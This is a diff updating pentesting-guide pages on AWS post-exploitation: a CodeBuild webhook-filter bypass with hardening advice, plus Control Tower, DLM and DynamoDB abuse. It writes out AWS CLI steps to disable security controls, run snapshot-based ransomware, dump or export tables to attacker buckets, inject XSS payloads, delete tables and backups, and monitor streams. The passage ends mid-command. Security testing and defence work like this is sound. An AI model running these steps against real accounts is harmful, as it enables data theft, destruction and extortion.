--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-untrusted-pr-webhook-bypass.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-untrusted-pr-webhook-bypass.md
@@ -1,17 +1,15 @@
 # AWS CodeBuild - Untrusted PR Webhook Bypass (CodeBreach-style)
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 This attack vector appears when a **public-facing PR workflow** is wired to a **privileged CodeBuild project** with weak webhook controls.
 
-If an external attacker can make CodeBuild execute their pull request, they can usually get **arbitrary code execution inside the build** (build scripts, dependency hooks, test scripts, etc.), and then pivot to secrets, IAM credentials, or source-provider credentials.
+If an external attacker can make CodeBuild execute their pull request, they can usually get **arbitrary code execution inside the build** (build scripts, dependency hooks, test scripts, etc.), and then pivot to secrets, IAM credentials, or source-provider credentials.<sup>[[1]](#references)[[6]](#references)</sup>
 
 ## Why this is dangerous
 
-CodeBuild webhook filters are evaluated with regex patterns (for non-`EVENT` filters). In the `ACTOR_ACCOUNT_ID` filter, this means a weak pattern can match more users than intended.  
-If untrusted PRs are built in a project that has privileged AWS role permissions or GitHub credentials, this can become a full supply-chain compromise.
+CodeBuild webhook filters are evaluated with regex patterns (for non-`EVENT` filters). In the `ACTOR_ACCOUNT_ID` filter, this means a weak pattern can match more users than intended.<sup>[[2]](#references)</sup>
+If untrusted PRs are built in a project that has privileged AWS role permissions or GitHub credentials, this can become a full supply-chain compromise.<sup>[[1]](#references)[[6]](#references)</sup>
 
-Wiz showed a practical chain where:
+Wiz showed a practical chain where:<sup>[[1]](#references)</sup>
 
 1. A webhook actor allowlist used an **unanchored regex**.
 2. An attacker registered a GitHub ID that matched as a **superstring** of a trusted ID.
@@ -23,18 +21,18 @@ Wiz showed a practical chain where:
 The following are high-risk mistakes and how attackers abuse each one:
 
 1. **`EVENT` filters allow untrusted triggers**
-   - Common risky events: `PULL_REQUEST_CREATED`, `PULL_REQUEST_UPDATED`, `PULL_REQUEST_REOPENED`.
-   - Other events that can also become dangerous if tied to privileged builds: `PUSH`, `PULL_REQUEST_CLOSED`, `PULL_REQUEST_MERGED`, `RELEASED`, `PRERELEASED`, `WORKFLOW_JOB_QUEUED`.
+   - Common risky events: `PULL_REQUEST_CREATED`, `PULL_REQUEST_UPDATED`, `PULL_REQUEST_REOPENED`.<sup>[[2]](#references)</sup>
+   - Other events that can also become dangerous if tied to privileged builds: `PUSH`, `PULL_REQUEST_CLOSED`, `PULL_REQUEST_MERGED`, `RELEASED`, `PRERELEASED`, `WORKFLOW_JOB_QUEUED`.<sup>[[2]](#references)</sup>
    - Bad: `EVENT="PUSH, PULL_REQUEST_CREATED, PULL_REQUEST_UPDATED"` in a privileged project.
-   - Better: use PR comment approval and minimize trigger events for privileged projects.
-   - Abuse: attacker opens/updates PR or pushes to a branch they control, and their code executes in CodeBuild.
+   - Better: use PR comment approval and minimize trigger events for privileged projects.<sup>[[5]](#references)</sup>
+   - Abuse: attacker opens/updates PR or pushes to a branch they control, and their code executes in CodeBuild.<sup>[[1]](#references)[[6]](#references)</sup>
 
 2. **`ACTOR_ACCOUNT_ID` regex is weak**
    - Bad: unanchored patterns like `123456|7890123`.
-   - Better: exact-match anchoring `^(123456|7890123)$`.
-   - Abuse: regex over-match allows unauthorized GitHub IDs to pass allowlists.
+   - Better: exact-match anchoring `^(123456|7890123)$`.<sup>[[1]](#references)[[2]](#references)</sup>
+   - Abuse: regex over-match allows unauthorized GitHub IDs to pass allowlists.<sup>[[1]](#references)</sup>
 
-3. **Other regex filters are weak or missing**
+3. **Other regex filters are weak or missing**<sup>[[2]](#references)</sup>
    - `HEAD_REF`
      - Bad: `refs/heads/.*`
      - Better: `^refs/heads/main$` (or an explicit trusted list)
@@ -43,7 +41,7 @@ The following are high-risk mistakes and how attackers abuse each one:
      - Better: `^refs/heads/main$`
    - `FILE_PATH`
      - Bad: no path restrictions
-     - Better: exclude risky files like `^buildspec\\.yml$`, `^\\.github/workflows/.*`, `(^|/)package(-lock)?\\.json$`
+     - Better: exclude risky files like `^buildspec\\.yml$`, `^\\.github/workflows/.*`, `(^|/)package(-lock)?\\.json$`.<sup>[[2]](#references)[[4]](#references)</sup>
    - `COMMIT_MESSAGE`
      - Bad: trust marker with loose match like `trusted`
      - Better: do not use commit message as a trust boundary for PR execution
@@ -53,44 +51,44 @@ The following are high-risk mistakes and how attackers abuse each one:
    - `WORKFLOW_NAME`
      - Bad: `.*`
      - Better: exact workflow name matches only (or avoid this as trust control)
-   - Abuse: attacker crafts ref/path/message/repo context to satisfy permissive regex and trigger builds.
+   - Abuse: attacker crafts ref/path/message/repo context to satisfy permissive regex and trigger builds.<sup>[[2]](#references)</sup>
 
-4. **`excludeMatchedPattern` is misused**
-   - Setting this flag incorrectly can invert intended logic.
+4. **`excludeMatchedPattern` is misused**<sup>[[2]](#references)</sup>
+   - Setting this flag incorrectly can invert intended logic.<sup>[[2]](#references)</sup>
    - Bad: `FILE_PATH '^buildspec\\.yml$'` with `excludeMatchedPattern=false` when intent was to block buildspec edits.
-   - Better: same pattern with `excludeMatchedPattern=true` to deny builds touching `buildspec.yml`.
-   - Abuse: defenders think they deny risky events/paths/actors, but actually allow them.
+   - Better: same pattern with `excludeMatchedPattern=true` to deny builds touching `buildspec.yml`.<sup>[[2]](#references)[[4]](#references)</sup>
+   - Abuse: defenders think they deny risky events/paths/actors, but actually allow them.<sup>[[2]](#references)</sup>
 
 5. **Multiple `filterGroups` create accidental bypasses**
-   - CodeBuild evaluates groups as OR (one passing group is enough).
+   - CodeBuild evaluates groups as OR (one passing group is enough).<sup>[[3]](#references)</sup>
    - Bad: one strict group + one permissive fallback group (e.g., only `EVENT=PULL_REQUEST_UPDATED`).
    - Better: remove fallback groups that do not enforce actor/ref/path constraints.
    - Abuse: attacker only needs to satisfy the weakest group.
 
 6. **Comment approval gate disabled or too permissive**
-   - `pullRequestBuildPolicy.requiresCommentApproval=DISABLED` is least safe.
+   - `pullRequestBuildPolicy.requiresCommentApproval=DISABLED` is least safe.<sup>[[5]](#references)</sup>
    - Overly broad approver roles reduce the control.
    - Bad: `requiresCommentApproval=DISABLED`.
-   - Better: `ALL_PULL_REQUESTS` or `FORK_PULL_REQUESTS` with minimal approver roles.
-   - Abuse: fork/drive-by PRs auto-run without trusted maintainer approval.
+   - Better: `ALL_PULL_REQUESTS` or `FORK_PULL_REQUESTS` with minimal approver roles.<sup>[[5]](#references)</sup>
+   - Abuse: fork/drive-by PRs auto-run without trusted maintainer approval.<sup>[[5]](#references)[[6]](#references)</sup>
 
-7. **No restrictive branch/path strategy for PR builds**
+7. **No restrictive branch/path strategy for PR builds**<sup>[[4]](#references)</sup>
    - Missing defense-in-depth with `HEAD_REF` + `BASE_REF` + `FILE_PATH`.
    - Bad: only `EVENT` + `ACTOR_ACCOUNT_ID`, no ref/path controls.
-   - Better: combine exact `ACTOR_ACCOUNT_ID` + `BASE_REF` + `HEAD_REF` + `FILE_PATH` restrictions.
-   - Abuse: attacker modifies build inputs (buildspec/CI/dependencies) and gets arbitrary command execution.
+   - Better: combine exact `ACTOR_ACCOUNT_ID` + `BASE_REF` + `HEAD_REF` + `FILE_PATH` restrictions.<sup>[[2]](#references)[[4]](#references)</sup>
+   - Abuse: attacker modifies build inputs (buildspec/CI/dependencies) and gets arbitrary command execution.<sup>[[1]](#references)[[6]](#references)</sup>
 
-8. **Public visibility + status URL exposure**
-   - Public build/check URLs improve attacker recon and iterative testing.
-   - Bad: `projectVisibility=PUBLIC_READ` with sensitive logs/config in public builds.
-   - Better: keep projects private unless there is a strong business need, and sanitize logs/artifacts.
-   - Abuse: attacker discovers project patterns/behavior, then tunes payloads and bypass attempts.
+8. **Public visibility + status URL exposure**<sup>[[1]](#references)[[7]](#references)[[11]](#references)</sup>
+   - Public build/check URLs improve attacker recon and iterative testing.<sup>[[1]](#references)[[7]](#references)[[11]](#references)</sup>
+   - Bad: `projectVisibility=PUBLIC_READ` with sensitive logs/config in public builds.<sup>[[7]](#references)[[11]](#references)</sup>
+   - Better: keep projects private unless there is a strong business need, and sanitize logs/artifacts.<sup>[[7]](#references)</sup>
+   - Abuse: attacker discovers project patterns/behavior, then tunes payloads and bypass attempts.<sup>[[1]](#references)[[7]](#references)</sup>
 
 ## Token leakage from memory
 
-Wiz's write-up explains that source-provider credentials are present in build runtime context and can be stolen after build compromise (for example, via memory dumping), enabling repository takeover if scopes are broad.
+Wiz's write-up explains that source-provider credentials are present in build runtime context and can be stolen after build compromise (for example, via memory dumping), enabling repository takeover if scopes are broad.<sup>[[1]](#references)[[6]](#references)</sup>
 
-AWS introduced hardening after the disclosure, but the core lesson remains: **never execute untrusted PR code in privileged build contexts** and assume attacker-controlled build code will attempt credential theft.
+AWS introduced hardening after the disclosure, but the core lesson remains: **never execute untrusted PR code in privileged build contexts** and assume attacker-controlled build code will attempt credential theft.<sup>[[1]](#references)[[6]](#references)</sup>
 
 For additional credential theft techniques in CodeBuild, also check:
 
@@ -100,13 +98,13 @@ aws-codebuild-token-leakage.md
 
 ## Finding CodeBuild URLs in GitHub PRs
 
-If CodeBuild reports commit status back to GitHub, the CodeBuild build URL usually appears in:
+If CodeBuild reports commit status back to GitHub, the CodeBuild build URL usually appears in:<sup>[[8]](#references)[[9]](#references)[[10]](#references)</sup>
 
 1. **PR page** -> **Checks** tab (or the status line in Conversation/Commits).
 2. **Commit page** -> status/checks section -> **Details** link.
 3. **PR commits list** -> click the check context attached to a commit.
 
-For public projects, this link can expose build metadata/configuration to unauthenticated users.
+For public projects, this link can expose build metadata/configuration to unauthenticated users.<sup>[[1]](#references)[[7]](#references)[[11]](#references)</sup>
 
 <details>
 <summary>Script: detect CodeBuild URLs in a PR and test if they look public</summary>
@@ -215,27 +213,34 @@ aws codebuild list-source-credentials
 
 Review each project for:
 
-- `webhook.filterGroups` containing PR events.
-- `ACTOR_ACCOUNT_ID` patterns that are not anchored with `^...$`.
-- `pullRequestBuildPolicy.requiresCommentApproval` equal to `DISABLED`.
-- Missing branch/path restrictions.
-- High-privilege `serviceRole`.
-- Risky source credentials scope and reuse.
+- `webhook.filterGroups` containing PR events.<sup>[[2]](#references)[[3]](#references)</sup>
+- `ACTOR_ACCOUNT_ID` patterns that are not anchored with `^...$`.<sup>[[1]](#references)[[2]](#references)</sup>
+- `pullRequestBuildPolicy.requiresCommentApproval` equal to `DISABLED`.<sup>[[5]](#references)</sup>
+- Missing branch/path restrictions.<sup>[[2]](#references)[[4]](#references)</sup>
+- High-privilege `serviceRole`.<sup>[[4]](#references)</sup>
+- Risky source credentials scope and reuse.<sup>[[1]](#references)[[6]](#references)</sup>
 
 ## Hardening guidance
 
-1. Require comment approval for PR builds (`ALL_PULL_REQUESTS` or `FORK_PULL_REQUESTS`).
-2. If using actor allowlists, anchor regexes and keep them exact.
-3. Add `FILE_PATH` restrictions to avoid untrusted edits to `buildspec.yml` and CI scripts.
-4. Separate trusted release builds from untrusted PR builds into different projects/roles.
-5. Use fine-grained, least-privileged source-provider tokens (prefer dedicated low-privilege identities).
-6. Continuously audit webhook filters and source credential usage.
+1. Require comment approval for PR builds (`ALL_PULL_REQUESTS` or `FORK_PULL_REQUESTS`).<sup>[[5]](#references)</sup>
+2. If using actor allowlists, anchor regexes and keep them exact.<sup>[[1]](#references)[[2]](#references)</sup>
+3. Add `FILE_PATH` restrictions to avoid untrusted edits to `buildspec.yml` and CI scripts.<sup>[[4]](#references)</sup>
+4. Separate trusted release builds from untrusted PR builds into different projects/roles.<sup>[[4]](#references)</sup>
+5. Use fine-grained, least-privileged source-provider tokens (prefer dedicated low-privilege identities).<sup>[[1]](#references)[[6]](#references)</sup>
+6. Continuously audit webhook filters and source credential usage.<sup>[[4]](#references)[[6]](#references)</sup>
 
 ## References
 
-- [Wiz: CodeBreach - AWS CodeBuild ACTOR_ID regex bypass and token theft](https://www.wiz.io/blog/wiz-research-codebreach-vulnerability-aws-codebuild)
-- [AWS CodeBuild API - WebhookFilter](https://docs.aws.amazon.com/codebuild/latest/APIReference/API_WebhookFilter.html)
-- [AWS CLI - codebuild create-webhook](https://docs.aws.amazon.com/cli/latest/reference/codebuild/create-webhook.html)
-- [AWS CodeBuild User Guide - Best practices for webhooks](https://docs.aws.amazon.com/codebuild/latest/userguide/webhooks.html)
+- [1] [Wiz: CodeBreach - AWS CodeBuild ACTOR_ID regex bypass and token theft](https://www.wiz.io/blog/wiz-research-codebreach-vulnerability-aws-codebuild)
+- [2] [AWS CodeBuild API - WebhookFilter](https://docs.aws.amazon.com/codebuild/latest/APIReference/API_WebhookFilter.html)
+- [3] [AWS CLI - codebuild create-webhook](https://docs.aws.amazon.com/cli/latest/reference/codebuild/create-webhook.html)
+- [4] [AWS CodeBuild User Guide - Best practices for webhooks](https://docs.aws.amazon.com/codebuild/latest/userguide/webhooks.html)
+- [5] [AWS CodeBuild - Pull request comment approval](https://docs.aws.amazon.com/codebuild/latest/userguide/pull-request-build-policy.html)
+- [6] [AWS Security Bulletin AWS-2025-016 - Memory Dump Issue in AWS CodeBuild](https://aws.amazon.com/security/security-bulletins/aws-2025-016/)
+- [7] [AWS CodeBuild - Get public build project URLs](https://docs.aws.amazon.com/codebuild/latest/userguide/public-builds.html)
+- [8] [GitHub Docs - Status checks](https://docs.github.com/en/pull-requests/reference/status-checks)
+- [9] [GitHub REST API - Commit statuses](https://docs.github.com/en/rest/commits/statuses)
+- [10] [GitHub REST API - Check runs](https://docs.github.com/en/rest/checks/runs)
+- [11] [AWS CodeBuild Public Builds - Project build results](https://docs.aws.amazon.com/codebuild/latest/public-builds/project.build-results.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation/README.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation/README.md
@@ -1,7 +1,5 @@
 # AWS - Control Tower Post Exploitation
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## Control Tower
 
 {{#ref}}
@@ -10,15 +8,19 @@
 
 ### Enable / Disable Controls
 
-To further exploit an account, you might need to disable/enable Control Tower controls:
+To further exploit an account, you might need to disable or re-enable Control Tower controls. These operations accept a control ARN and the target organizational unit ARN, and run asynchronously.<sup>[[1]](#references)[[2]](#references)</sup>
 
 ```bash
-aws controltower disable-control --control-identifier <arn_control_id> --target-identifier <arn_account>
-aws controltower enable-control --control-identifier <arn_control_id> --target-identifier <arn_account>
+aws controltower disable-control --control-identifier <control_arn> --target-identifier <ou_arn>
+aws controltower enable-control --control-identifier <control_arn> --target-identifier <ou_arn>
 ```
 
-{{#include ../../../../banners/hacktricks-training.md}}
+## References
 
+- [1] [disable-control — AWS CLI 2 Command Reference](https://docs.aws.amazon.com/cli/latest/reference/controltower/disable-control.html)
+- [2] [enable-control — AWS CLI 2 Command Reference](https://docs.aws.amazon.com/cli/latest/reference/controltower/enable-control.html)
+
+{{#include ../../../../banners/hacktricks-training.md}}
 
 
 

--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation/README.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation/README.md
@@ -1,26 +1,24 @@
 # AWS - DLM Post Exploitation
 
-{{#include ../../../../banners/hacktricks-training.md}}
+## Data Lifecycle Manager (DLM)
 
-## Data Lifecycle Manger (DLM)
-
-### `EC2:DescribeVolumes`, `DLM:CreateLifeCyclePolicy`
+### `EC2:DescribeVolumes`, `DLM:CreateLifecyclePolicy`
 
 A ransomware attack can be executed by encrypting as many EBS volumes as possible and then erasing the current EC2 instances, EBS volumes, and snapshots. To automate this malicious activity, one can employ Amazon DLM, encrypting the snapshots with a KMS key from another AWS account and transferring the encrypted snapshots to a different account. Alternatively, they might transfer snapshots without encryption to an account they manage and then encrypt them there. Although it's not straightforward to encrypt existing EBS volumes or snapshots directly, it's possible to do so by creating a new volume or snapshot.
 
-Firstly, one will use a command to gather information on volumes, such as instance ID, volume ID, encryption status, attachment status, and volume type.
+Firstly, one will use a command to gather information on volumes, such as instance ID, volume ID, encryption status, attachment status, and volume type.<sup>[[1]](#references)</sup>
 
 `aws ec2 describe-volumes`
 
-Secondly, one will create the lifecycle policy. This command employs the DLM API to set up a lifecycle policy that automatically takes daily snapshots of specified volumes at a designated time. It also applies specific tags to the snapshots and copies tags from the volumes to the snapshots. The policyDetails.json file includes the lifecycle policy's specifics, such as target tags, schedule, the ARN of the optional KMS key for encryption, and the target account for snapshot sharing, which will be recorded in the victim's CloudTrail logs.
+Secondly, one will create the lifecycle policy. This command employs the DLM API to set up a lifecycle policy that automatically takes daily snapshots of specified volumes at a designated time. It also applies specific tags to the snapshots and copies tags from the volumes to the snapshots. The policyDetails.json file includes the lifecycle policy's specifics, such as target tags, schedule, the ARN of the optional KMS key for encryption, and the target account for snapshot sharing, which will be recorded in the victim's CloudTrail logs.<sup>[[2]](#references)[[3]](#references)[[4]](#references)[[5]](#references)[[6]](#references)</sup>
 
 ```bash
-aws dlm create-lifecycle-policy --description "My first policy" --state ENABLED --execution-role-arn arn:aws:iam::12345678910:role/AWSDataLifecycleManagerDefaultRole --policy-details file://policyDetails.json
+aws dlm create-lifecycle-policy --description "My first policy" --state ENABLED --execution-role-arn arn:aws:iam::123456789012:role/AWSDataLifecycleManagerDefaultRole --policy-details file://policyDetails.json
 ```
 
-A template for the policy document can be seen here:
+A template for the policy document can be seen here. Because this example targets individual volumes, it omits instance-only `VariableTags` and `ExcludeBootVolume` parameters; the cross-Region snapshot rule uses `Target`, the current field for custom snapshot policies.<sup>[[3]](#references)[[4]](#references)[[5]](#references)[[7]](#references)</sup>
 
-```bash
+```json
 {
   "PolicyType": "EBS_SNAPSHOT_MANAGEMENT",
   "ResourceTypes": [
@@ -42,12 +40,6 @@ A template for the policy document can be seen here:
           "Value": "DLM"
         }
       ],
-      "VariableTags": [
-        {
-          "Key": "CostCenter",
-          "Value": "Finance"
-        }
-      ],
       "CreateRule": {
         "Interval": 24,
         "IntervalUnit": "HOURS",
@@ -65,7 +57,7 @@ A template for the policy document can be seen here:
       },
       "CrossRegionCopyRules": [
         {
-          "TargetRegion": "us-west-2",
+          "Target": "us-west-2",
           "Encrypted": true,
           "CmkArn": "arn:aws:kms:us-west-2:123456789012:key/your-kms-key-id",
           "CopyTags": true,
@@ -85,15 +77,21 @@ A template for the policy document can be seen here:
         }
       ]
     }
-  ],
-  "Parameters": {
-    "ExcludeBootVolume": false
-  }
+  ]
 }
 ```
 
-{{#include ../../../../banners/hacktricks-training.md}}
+## References
 
+- [1] [DescribeVolumes - Amazon Elastic Compute Cloud](https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeVolumes.html)
+- [2] [CreateLifecyclePolicy - Amazon Data Lifecycle Manager](https://docs.aws.amazon.com/dlm/latest/APIReference/API_CreateLifecyclePolicy.html)
+- [3] [PolicyDetails - Amazon Data Lifecycle Manager](https://docs.aws.amazon.com/dlm/latest/APIReference/API_PolicyDetails.html)
+- [4] [Schedule - Amazon Data Lifecycle Manager](https://docs.aws.amazon.com/dlm/latest/APIReference/API_Schedule.html)
+- [5] [CrossRegionCopyRule - Amazon Data Lifecycle Manager](https://docs.aws.amazon.com/dlm/latest/APIReference/API_CrossRegionCopyRule.html)
+- [6] [ShareRule - Amazon Data Lifecycle Manager](https://docs.aws.amazon.com/dlm/latest/APIReference/API_ShareRule.html)
+- [7] [Parameters - Amazon Data Lifecycle Manager](https://docs.aws.amazon.com/dlm/latest/APIReference/API_Parameters.html)
+
+{{#include ../../../../banners/hacktricks-training.md}}
 
 
 

--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation/README.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation/README.md
@@ -1,7 +1,5 @@
 # AWS - DynamoDB Post Exploitation
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## DynamoDB
 
 For more information check:
@@ -12,7 +10,7 @@ For more information check:
 
 ### `dynamodb:BatchGetItem`
 
-An attacker with this permissions will be able to **get items from tables by the primary key** (you cannot just ask for all the data of the table). This means that you need to know the primary keys (you can get this by getting the table metadata (`describe-table`).
+An attacker with this permission can **get items from one or more tables by their primary keys**; it cannot be used to request arbitrary table contents. The primary keys can be obtained from table metadata (for example, `describe-table`).<sup>[[1]](#references)[[2]](#references)</sup>
 
 {{#tabs }}
 {{#tab name="json file" }}
@@ -26,7 +24,7 @@ aws dynamodb batch-get-item --request-items file:///tmp/a.json
         "Keys": [
             {
             "Id" : { // Primary keys name
-                "N": "205" // Value to search for, you could put here entries from 1 to 1000 to dump all those
+                "N": "205" // Value to search for; repeat requests for additional keys (up to 100 items per call)
             }
             }
         ]
@@ -51,7 +49,7 @@ aws dynamodb batch-get-item \
 
 ### `dynamodb:GetItem`
 
-**Similar to the previous permissions** this one allows a potential attacker to read values from just 1 table given the primary key of the entry to retrieve:
+**Similar to the previous permission**, this one allows an attacker to read one item from a table when its primary key is known.<sup>[[3]](#references)</sup>
 
 ```json
 aws dynamodb get-item --table-name ProductCatalog --key  file:///tmp/a.json
@@ -64,7 +62,7 @@ aws dynamodb get-item --table-name ProductCatalog --key  file:///tmp/a.json
 }
 ```
 
-With this permission it's also possible to use the **`transact-get-items`** method like:
+The same read permission also authorizes **`transact-get-items`**, which atomically retrieves multiple known items:<sup>[[4]](#references)[[24]](#references)</sup>
 
 ```json
 aws dynamodb transact-get-items \
@@ -87,7 +85,7 @@ aws dynamodb transact-get-items \
 
 ### `dynamodb:Query`
 
-**Similar to the previous permissions** this one allows a potential attacker to read values from just 1 table given the primary key of the entry to retrieve. It allows to use a [subset of comparisons](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html), but the only comparison allowed with the primary key (that must appear) is "EQ", so you cannot use a comparison to get the whole DB in a request.
+**Similar to the previous permission**, this one reads items by partition key. A `Query` must specify an equality condition for the partition key; an optional sort-key condition can use other comparison operators, so a single request cannot retrieve an entire table. It accepts a [subset of comparisons](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html).<sup>[[5]](#references)[[6]](#references)</sup>
 
 {{#tabs }}
 {{#tab name="json file" }}
@@ -123,7 +121,7 @@ aws dynamodb query \
 
 ### `dynamodb:Scan`
 
-You can use this permission to **dump the entire table easily**.
+You can use this permission to **enumerate every item in a table**; repeat the request with `LastEvaluatedKey` when DynamoDB paginates the result.<sup>[[7]](#references)</sup>
 
 ```bash
 aws dynamodb scan --table-name <t_name> #Get data inside the table
@@ -133,27 +131,27 @@ aws dynamodb scan --table-name <t_name> #Get data inside the table
 
 ### `dynamodb:PartiQLSelect`
 
-You can use this permission to **dump the entire table easily**.
+You can use this permission to **enumerate the entire table with PartiQL** when the `SELECT` has no partition-key equality condition; the response is paginated as needed.<sup>[[8]](#references)[[9]](#references)</sup>
 
 ```bash
 aws dynamodb execute-statement \
     --statement "SELECT * FROM ProductCatalog"
 ```
 
-This permission also allow to perform `batch-execute-statement` like:
+This permission also allows `batch-execute-statement` reads like:
 
 ```bash
 aws dynamodb batch-execute-statement \
     --statements '[{"Statement": "SELECT * FROM ProductCatalog WHERE Id = 204"}]'
 ```
 
-but you need to specify the primary key with a value, so it isn't that useful.
+Each read statement in a batch must specify equality for every key attribute and therefore returns at most one item, so it is not useful for an unrestricted dump.<sup>[[10]](#references)</sup>
 
 **Potential Impact:** Indirect privesc by locating sensitive information in the table
 
-### `dynamodb:ExportTableToPointInTime|(dynamodb:UpdateContinuousBackups)`
+### `dynamodb:ExportTableToPointInTime` (and `dynamodb:UpdateContinuousBackups` if PITR is disabled)
 
-This permission will allow an attacker to **export the whole table to a S3 bucket** of his election:
+With `dynamodb:ExportTableToPointInTime`, an attacker can **export table data to an S3 bucket** they can write to. The table must have point-in-time recovery (PITR) enabled; if it is disabled, `dynamodb:UpdateContinuousBackups` can enable it first.<sup>[[11]](#references)[[12]](#references)[[13]](#references)</sup>
 
 ```bash
 aws dynamodb export-table-to-point-in-time \
@@ -164,14 +162,14 @@ aws dynamodb export-table-to-point-in-time \
     --region <region>
 ```
 
-Note that for this to work the table needs to have point-in-time-recovery enabled, you can check if the table has it with:
+Note that for this to work the table needs to have point-in-time-recovery enabled, you can check if the table has it with:<sup>[[11]](#references)</sup>
 
 ```bash
 aws dynamodb describe-continuous-backups \
   --table-name <tablename>
 ```
 
-If it isn't enabled, you will need to **enable it** and for that you need the **`dynamodb:ExportTableToPointInTime`** permission:
+If PITR is disabled, enable it with `dynamodb:UpdateContinuousBackups`:<sup>[[13]](#references)</sup>
 
 ```bash
 aws dynamodb update-continuous-backups \
@@ -181,9 +179,9 @@ aws dynamodb update-continuous-backups \
 
 **Potential Impact:** Indirect privesc by locating sensitive information in the table
 
-### `dynamodb:CreateTable`, `dynamodb:RestoreTableFromBackup`, (`dynamodb:CreateBackup)`
+### `dynamodb:RestoreTableFromBackup` (and `dynamodb:CreateBackup` to create a source backup)
 
-With these permissions, an attacker would be able to **create a new table from a backup** (or even create a backup to then restore it in a different table). Then, with the necessary permissions, he would be able to check **information** from the backups that c**ould not be any more in the production** table.
+`dynamodb:RestoreTableFromBackup` lets an attacker **create a new table from an existing backup**. With `dynamodb:CreateBackup`, they can first snapshot the source table and then restore that backup into a separate table, where the necessary read permissions can expose data no longer present in production.<sup>[[14]](#references)[[15]](#references)</sup>
 
 ```bash
 aws dynamodb restore-table-from-backup \
@@ -196,14 +194,14 @@ aws dynamodb restore-table-from-backup \
 
 ### `dynamodb:PutItem`
 
-This permission allows users to add a **new item to the table or replace an existing item** with a new item. If an item with the same primary key already exists, the **entire item will be replaced** with the new item. If the primary key does not exist, a new item with the specified primary key will be **created**.
+This permission allows users to add a **new item to the table or replace an existing item** with a new item. If an item with the same primary key already exists, the **entire item will be replaced** with the new item. If the primary key does not exist, a new item with the specified primary key will be **created**.<sup>[[16]](#references)</sup>
 
 {{#tabs }}
 {{#tab name="XSS Example" }}
 
 ```bash
 ## Create new item with XSS payload
-aws dynamodb put-item --table <table_name> --item file://add.json
+aws dynamodb put-item --table-name <table_name> --item file://add.json
 ### With add.json:
 {
    "Id": {
@@ -232,18 +230,18 @@ aws dynamodb put-item \
 {{#endtab }}
 {{#endtabs }}
 
-**Potential Impact:** Exploitation of further vulnerabilities/bypasses by being able to add/modify data in a DynamoDB table
+**Potential Impact:** Replacing an entire existing item or inserting a crafted item can corrupt application state and enable downstream authorization or business-logic abuse.<sup>[[16]](#references)</sup>
 
 ### `dynamodb:UpdateItem`
 
-This permission allows users to **modify the existing attributes of an item or add new attributes to an item**. It does **not replace** the entire item; it only updates the specified attributes. If the primary key does not exist in the table, the operation will **create a new item** with the specified primary key and set the attributes specified in the update expression.
+This permission allows users to **modify the existing attributes of an item or add new attributes to an item**. It does **not replace** the entire item; it only updates the specified attributes. If the primary key does not exist in the table, the operation will **create a new item** with the specified primary key and set the attributes specified in the update expression.<sup>[[17]](#references)</sup>
 
 {{#tabs }}
 {{#tab name="XSS Example" }}
 
 ```bash
 ## Update item with XSS payload
-aws dynamodb update-item --table <table_name> \
+aws dynamodb update-item --table-name <table_name> \
     --key file://key.json --update-expression "SET Description = :value" \
     --expression-attribute-values file://val.json
 ### With key.json:
@@ -276,11 +274,11 @@ aws dynamodb update-item \
 {{#endtab }}
 {{#endtabs }}
 
-**Potential Impact:** Exploitation of further vulnerabilities/bypasses by being able to add/modify data in a DynamoDB table
+**Potential Impact:** Targeted attribute changes—or creation of a record when the supplied key does not exist—can alter application behavior without replacing the whole item.<sup>[[17]](#references)</sup>
 
 ### `dynamodb:DeleteTable`
 
-An attacker with this permission can **delete a DynamoDB table, causing data loss**.
+An attacker with this permission can **delete a DynamoDB table, causing data loss**.<sup>[[18]](#references)</sup>
 
 ```bash
 aws dynamodb delete-table \
@@ -292,7 +290,7 @@ aws dynamodb delete-table \
 
 ### `dynamodb:DeleteBackup`
 
-An attacker with this permission can **delete a DynamoDB backup, potentially causing data loss in case of a disaster recovery scenario**.
+An attacker with this permission can **delete a DynamoDB backup, potentially causing data loss in case of a disaster recovery scenario**.<sup>[[19]](#references)</sup>
 
 ```bash
 aws dynamodb delete-backup \
@@ -302,12 +300,12 @@ aws dynamodb delete-backup \
 
 **Potential impact**: Data loss and inability to recover from a backup during a disaster recovery scenario.
 
-### `dynamodb:StreamSpecification`, `dynamodb:UpdateTable`, `dynamodb:DescribeStream`, `dynamodb:GetShardIterator`, `dynamodb:GetRecords`
+### `dynamodb:UpdateTable`, `dynamodb:DescribeStream`, `dynamodb:GetShardIterator`, `dynamodb:GetRecords`
 
 > [!NOTE]
 > TODO: Test if this actually works
 
-An attacker with these permissions can **enable a stream on a DynamoDB table, update the table to begin streaming changes, and then access the stream to monitor changes to the table in real-time**. This allows the attacker to monitor and exfiltrate data changes, potentially leading to data leakage.
+An attacker with these permissions can **enable a stream on a DynamoDB table and then access it to monitor changes in real time**. `StreamSpecification` is the `UpdateTable` request parameter, not an IAM permission. This allows the attacker to monitor and exfiltrate data changes, potentially leading to data leakage.<sup>[[20]](#references)[[21]](#references)[[22]](#references)[[23]](#references)[[24]](#references)</sup>
 
 1. Enable a stream on a DynamoDB table:
 
@@ -318,11 +316,15 @@ aws dynamodb update-table \
     --region <region>
 ```
 
-2. Describe the stream to obtain the ARN and other details:
+2. Obtain the stream ARN from the table metadata and describe the stream to enumerate its shards:
 
 ```bash
-aws dynamodb describe-stream \
+STREAM_ARN=$(aws dynamodb describe-table \
     --table-name TargetTable \
+    --region <region> \
+    --query 'Table.LatestStreamArn' --output text)
+aws dynamodbstreams describe-stream \
